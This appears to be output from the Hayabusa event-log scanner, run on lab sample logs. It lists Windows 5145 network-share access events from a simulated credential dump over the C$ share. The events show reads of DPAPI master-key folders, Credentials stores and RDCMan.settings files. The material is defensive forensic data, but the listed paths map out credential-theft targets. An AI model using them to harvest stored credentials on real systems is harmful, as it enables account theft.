Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.632 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.648 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.680 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.763 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.794 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.826 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.841 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.889 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.905 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.956 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.568 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:14.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 